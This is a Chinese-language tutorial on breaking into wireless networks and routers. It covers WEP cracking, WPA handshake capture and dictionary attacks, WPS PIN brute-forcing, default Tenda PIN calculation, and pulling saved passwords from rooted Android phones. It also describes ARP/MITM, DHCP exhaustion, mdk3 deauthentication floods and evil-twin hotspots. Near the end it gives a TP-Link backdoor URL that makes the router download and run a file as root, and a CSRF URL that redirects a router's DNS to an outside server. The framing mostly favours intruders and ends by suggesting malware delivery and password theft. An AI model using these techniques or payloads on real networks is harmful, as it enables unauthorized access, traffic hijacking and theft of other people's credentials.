WEP破解??????????????????????????????
如果你的家用路由器的無線加密方式被配置為WEP加密,那么你就得馬上進行修改了,因為由于WEP加密體制缺陷,蹭網者能夠通過收集足夠的握手包(即計算機與無線路由器連接認證過程中的數據包),使用分析密算法還原出密碼。此類加密方式的攻擊成功率基本接近100%。比較常見的攻擊手法是使用MIDIWEP對周圍的無線信號進行嗅探,當抓取到足夠多的IVS時就可以自動解出無線密碼,如下圖所示:
無線路由器的另一種加密方式為WPA/WPA2加密,相比較于WEP加密,暫時未能從一些公開的方法中找到直接破解WPA/WPA2密碼的方法,只能先抓獲握手包,然后對握手包進行暴力破解,但是結合著一些技巧以及普通用戶密碼策略比較薄弱,成功的機率也比較高。
抓握手包跑字典,這主要看你的字典給不給力了,拼人品的時間到了,和破解wep操作一樣的,選中信號點lanch開始抓包,抓包的時候路由器是一定要有用戶使用,目的是攻擊導致對方掉線,在自動重連的過程中抓取WPA認證的四次握手包。如果一直沒找到在線的客戶端,就抓不到包的,只能等有人用的時候再試了。
彈出下面這個提示,說明抓包成功了,把包拷出來用EWSA驗證下是不是完整的握手包,要包含完整的四次握手信息才能用來破解。
只有提示是有效的數據包才能進行字典破解,像下面這樣的數據包就是可以利用的。
接下來請出hashcat神器或者ewsa直接跑字典,(由于我的電腦配置不是很高 往往我選擇的是)直接丟到淘寶讓專業人士來跑
大部分無線路由器都有個WPS快速連接的功能,只要連接的時候輸入路由器正確的pin管理碼,就可以自動的根據算法協商密鑰連上WiFi。這個pin碼是8位純數字,前4位和后4位是分開驗證的,第8位是檢驗碼(根據前7位按照一定的算法可以推出第8位)。也就是說如果要窮舉這個pin碼,只需要10^4+10^3=11000次,reaver就是干這個差事的工具。只要路由器開啟了WPS功能,并且沒有鎖死WPS的機制,是百分百可以嘗試出正確的pin碼,得到pin碼后就能獲取到wpa密碼了。而且大部分情況下,路由器出廠開放WPS功能哦:)。不過要說明的是有些路由器,試錯pin碼多次會鎖死,這種情況下只能用第一種抓包跑密碼了。
點擊掃描出現路由器MAC 名稱 等信息 帶有WPS支持PIN碼破解,掃描出來帶有WPS路由器,點擊Reaver進行PIN碼窮舉攻擊。如下圖
現已破解出PIN碼
進行連接
在框中輸入破解得到的pin碼。點擊下一步,軟件會自動尋找路由,自動連接啦
騰達無線路由器MAC地址以“C83A35”或“00B00C”打頭的默認PIN碼,可以算出來
把計算器調為程序員型,選十六進制,比如08:10:76:0F:B3:5C這個MAC地址,取后六位,輸入完后選十進制就算出pin碼前7位了,第8位程序會自己補全。
計算得到的 就是路由的pin的前7位了,pin碼共由8位數字組成,前7位已經出來了,最后一位自己猜呀猜就出來了,猜出了就直接連接路由啦。
用WiFi萬能鑰匙獲取WiFi密碼,前提是已經root的安卓手機。WiFi萬能鑰匙從服務器獲取到別人分享的密碼來連接WiFi,斷開后就把密碼清除了。重點來了,WiFi在連接的過程中密碼是保存在本機的/data/misc/wifi/wpa_supplicant.conf上的,我們可以強行終止WiFi萬能鑰匙進程,那密碼就永久保存下來了,這時候用帶文件管理器比如re或者es瀏覽器,打開/data/misc/wifi/wpa_supplicant.conf就能看到密碼了。
或者裝個app吧,搜下WiFi連接管理器,長按顯示密碼就行了,都需要root權限的。
所謂中間人攻擊就是目標主機與另一主機進行正常連接的過程中,攻擊者通過攔截、插入、偽造、中斷數據包等方式,達到獲取對方登陸賬戶及密碼,偽造身份等目的。
手機端進行ARP攻擊
連接進入網絡之后,使用dSploit掃描到的設備列表與路由器管理界面中的一模一樣:
基于軟件的無線跳板攻擊是指在有線網絡的基礎上,加入了無線網絡的環節,通過配合使用有線網絡內的主機、筆記本作為傳輸節點,一一連接起來進行無線信號到有線網絡的傳輸。
使用主機、無線路由器或者無線AP作為傳輸節點,并一一連接起來以便進行無線信號的傳輸,也就是常說的無線中繼。
通過將多個無線AP中繼,將原本內部的無線網絡信號傳遞出來。
利用DHCP的脆弱性發起的攻擊能夠迅速耗盡IP地址池,導致大面積的業務癱瘓,而且難以追蹤,危害性極大。
大量IP被占用
驗證洪水攻擊
和傳統的有線網絡一樣,無線路由器也會面臨無線DOS攻擊的威脅
我們使用mdk3來測試驗證洪水攻擊。
我們可以看到mdk3偽造了大量的虛假客戶端去連接chinanet,MA地址也都是隨機偽造的。
取消驗證洪水攻擊
客戶端與AP建立連接
通過廣播插入偽造的取消身份驗證報文
客戶端認為該報文來自AP
已連接的客戶端自行斷開連接
這種攻擊不是針對AP的,而是針對于client的,當我們發動攻擊的時候我們可以馬上看到無法訪問網絡了,見效很快。此時我們可以利用-s參數來加快發包速率。這種效率是非常高的,一般發動開始,client便開始斷網。
建立虛假wifi熱點,等候別人的連接,安裝tcpdump等工具進行抓包竊取數據。
利用智能手機 Wi-Fi 廣播 協議的缺陷 / 自動接入設計進行攻擊。
手機連接過WIFI熱點信息之后會保存在手機里,每次進入無線覆蓋范圍就會自動接入。
公開WIFI熱點
中國移動熱點:CMCC、CMCC-EDU 等
中國聯通熱點:ChinaUnicom 等
中國電信熱點:ChinaNet、ChinaTelecom 等
無線設備為了加快連接速度,會對外廣播過它連接過什么無線,ssid是多少。如果我截獲到了這個廣播,我自然能知道你連過什么無線,把這個無線偽造出來
建立相同SSID 切沒有密碼的ap熱點,手機會主動連接手機里已連接過的AP熱點,連接的時候只驗證SSID是否相同,當不存在密碼的時候,不用去驗證,會主動連接。(應該是安卓4.2以下版本可以)。
國產手機自帶的Wlan服務(刪都刪不掉)
將運營商的 Wi-Fi 熱點內置到你的手機中,更有甚者一些手機中這幾個 Wi-Fi 你都刪不掉,碰到了就連上,這樣的情況下 我們隨意建立一個類似于CMCC 等熱點就可以進行信息竊取。
TP-link后門
TP-LINK的某些型號的路由器存在一個后門功能,通過訪問某個無需授權認證的特定頁面,路由器會自動從攻擊者控制的TFTP服務器上下載程序并執行。攻擊者利用這個漏洞可以在路由器上以root身份執行任意命令,從而可完全控制路由器。
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html ” ,路由器會從發起請求的機器通過tftp下載一個nart.out文件,并以root權限執行該文件。
CSRF攻擊
IE不支持Http Authentication 使用此方法在IE下攻擊是無效的 完美兼容FF chrome。
http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1= 192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5&dnsserver2=8.8.8.8&Save=%25B1%25A3+%25B4%25E6
烽火通信某款路由器被爆存在漏洞-可遠程修改DNS
http://www.exploit-db.com/exploits/28450/
網絡出口流量控制在你手里,手機端利用更新 系統漏洞掛馬? PC端利用IE等漏洞來掛馬? 竊取登錄密碼等等。
控制路由器就等于控制80%以上的通訊數據包,利用方式和局域網嗅探、劫持大同小異。